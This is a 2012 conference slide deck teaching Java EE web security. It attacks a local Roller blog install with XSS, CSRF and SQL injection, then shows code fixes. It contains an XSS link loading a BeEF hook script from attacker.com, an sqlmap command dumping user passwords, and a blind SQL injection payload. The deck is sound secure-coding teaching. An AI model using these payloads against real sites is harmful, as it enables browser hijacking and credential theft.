Java EE Web Security By Example: Frank Kim

Java EE Web Security
By Example

JAX 2012

About

•  Frank Kim
–  Consultant, ThinkSec
–  Author, SANS Secure Coding in Java/JEE
–  SANS Application Security Curriculum Lead

Java EE Web Security By Example 2

What You Should Know

•  Hacking is not hard
•  Don’t trust any data
– Assume that your
users are evil!


Outline

•  Web App Attack Refresher
–  XSS, CSRF, SQL Injection
•  Testing
–  Hacking an open source app
•  Secure Coding
–  Fixing security bugs


Cross-Site Scripting (XSS)

•  Occurs when unvalidated data is
displayed back to the browser
•  Types of XSS
– Stored
– Reflected
– Document Object Model (DOM) based


Cross-Site Request Forgery
(CSRF)


SQL Injection (SQLi)
•  Occurs when dynamic SQL queries are used
–  By injecting arbitrary SQL commands, attackers
can extend the meaning of the original query
–  Can potentially execute any SQL statement on
the database
•  Very powerful
–  #1 on CWE/SANS Top 25 Most Dangerous
Software Errors
–  #1 on OWASP Top 10

Outline

•  Testing


What are We Testing?
•  Installation of Roller 3.0
•  Fake install of SANS AppSec Street Fighter Blog
•  Want to simulate the actions that a real attacker
might take
–  There are definitely other avenues of attack
–  We're walking through one attack scenario


Attack Scenario

1)  XSS to control the victim's browser
2)  Combine XSS and CSRF to conduct a
privilege escalation attack
- Use escalated privileges to access another feature
3)  Use SQL Injection to access the
database directly


Spot the Vuln - XSS


XSS in head.jsp


Testing the "look" Param

•  Admin pages include head.jsp
•  The param is persistent for the session


XSS Exploitation

•  Introducing BeEF
–  Browser Exploitation Framework
–  http://www.bindshell.net/tools/beef
•  Uses XSS to hook the victim's browser
–  Log user keystrokes, view browsing history,
execute JavaScript, etc
–  Advanced attacks - Metasploit integration,
browser exploits, etc


XSS Exploitation Overview

1) Sends link with evil BeEF script

http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script
src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>

2) Victim clicks evil link
Attacker Victim

3) Victim's browser sends data
to attacker


Spot the Vuln - CSRF


CSRF in UserAdmin.jsp

Want to use
CSRF to change
this field


Spot the Vuln – SQL Injection


SQL Injection in
UserServlet


SQL Injection Testing

• UserServlet is vulnerable to SQLi
http://localhost:8080/roller/roller-ui/authoring/user

No results


Exploiting SQL Injection

•  Introducing sqlmap
–  http://sqlmap.sourceforge.net
•  Tool that automates detection and exploitation
of SQL Injection vulns
–  Supports MySQL, Oracle, PostgreSQL, MS SQL Server
–  Supports blind, inband, and batch queries
–  Fingerprint/enumeration - dump db schemas, tables/
column names, data, db users, etc
–  Takeover features - read/upload files, exec arbitrary
commands, exec Metasploit shellcode, etc

sqlmap Syntax
Ÿ Dump userids and passwords
python sqlmap.py
-u "http://localhost:8080/roller/roller-ui/
authoring/user?startsWith=f%25"
--cookie "username=test; JSESSIONID==<INSERT HERE>"
--drop-set-cookie -p startsWith
--dump -T rolleruser -C username,passphrase -v 2


How it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy




Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)),
CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal


Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS
LIMIT 2, 1), 1, 1);
returns i

LIMIT 2, 1), 2, 1);
returns l

LIMIT 2, 1), 3, 1);
returns o

Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
LIMIT 2, 1), 1, 1));
returns 105

LIMIT 2, 1), 2, 1));
returns 108

LIMIT 2, 1), 3, 1));
returns 111

Attack Summary

1)  XSS to control the victim's browser
2)  Combine XSS and CSRF to conduct a
privilege escalation attack
- Use escalated privileges to access another feature
3)  Use SQL Injection to access the
database directly


Outline

•  Testing


Data Validation
Inbound Data

Should I be consuming this?
Validation
Encoding
Outbound Data
Validation
Application Data Store
Inbound Data

Encoding Validation
Should I be emitting this?
Outbound Data


Output Encoding

•  Encoding
–  Convert characters so they are treated as data
and not special characters
•  Must escape differently depending
where data is displayed on the page
•  XSS Prevention Cheat Sheet
http://www.owasp.org/index.php/
XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sh
eet


Fix XSS in
head.jsp
•  Add URL encoding
<link rel="stylesheet" type="text/css"
media="all" href="<%= request.getContextPath()
%>/roller-ui/theme/<%=
ESAPI.encoder().encodeForURL(theme) %>/
colors.css" />


Fix CSRF in
Update User Functionality
• UserAdmin.jsp
– Add anti-CSRF token
<input type="hidden" name=<%=
CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%=
CSRFTokenUtil.getToken(request.getSession(false)) %> >

• UserAdminAction.java
– Check anti-CSRF token
if (!CSRFTokenUtil.isValid(req.getSession(false), req)){
return mapping.findForward("error");
}


Fix SQL Injection in
UserServlet.java
•  Use parameterized queries correctly
if (startsWith == null || startsWith.equals("")) {
query = "SELECT username, emailaddress FROM rolleruser";
stmt = con.prepareStatement(query);
} else {
query = "SELECT username, emailaddress FROM rolleruser
WHERE username like ? or emailaddress like ?";
stmt = con.prepareStatement(query);
stmt.setString(1, startsWith + "%");
stmt.setString(2, startsWith + "%");
}
rs = stmt.executeQuery();


Building Secure Software

Source: Microsoft SDL


Remember

•  Hacking is not hard
•  Don’t trust any data
–  Validate input
–  Encode output
–  Use CSRF tokens
–  Use parameterized queries


Thanks!

Frank Kim
frank@thinksec.com @sansappsec


Java EE Web Security By Example: Frank Kim

More Related Content

What's hot

Viewers also liked

Similar to Java EE Web Security By Example: Frank Kim

Recently uploaded

Java EE Web Security By Example: Frank Kim